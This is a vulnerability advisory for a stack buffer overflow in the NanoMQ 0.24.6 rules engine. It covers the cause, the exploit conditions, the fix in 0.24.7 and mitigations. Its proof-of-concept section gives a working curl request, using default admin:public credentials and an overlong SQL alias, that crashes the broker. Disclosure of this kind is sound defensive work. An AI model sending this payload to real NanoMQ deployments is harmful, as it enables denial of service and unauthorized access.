NanoMQ Rules Engine Remote Buffer Overflow ======= Summary ======= A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact. Target: NanoMQ (emqx/nanomq:latest-full image tested) Version Affected: ≤ 0.24.6 ============ How It Works ============ The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from the unsafe use of the string copy functions. For the vulnerability to be exploitable, two conditions must be met: 1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint. 2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries. However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if HTTP server is enabled. ======= Testing ======= Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field. =========== Environment =========== docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full === PoC === curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}" After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection. ==== Logs ==== *** buffer overflow detected ***: terminated WARN /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081 NanoMQ Broker is started successfully! ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error! ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null) ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error! ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received! ====== Impact ====== This vulnerability may lead to: - Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request. - Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code. ========== Mitigation ========== The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow. The fix was introduced in this commit: - https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81 Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability. Other mitigations could include ensuring the HTTP server or Rules Engine is disabled. Jeremy Brown (jbrown3264/gmail), Jan 2026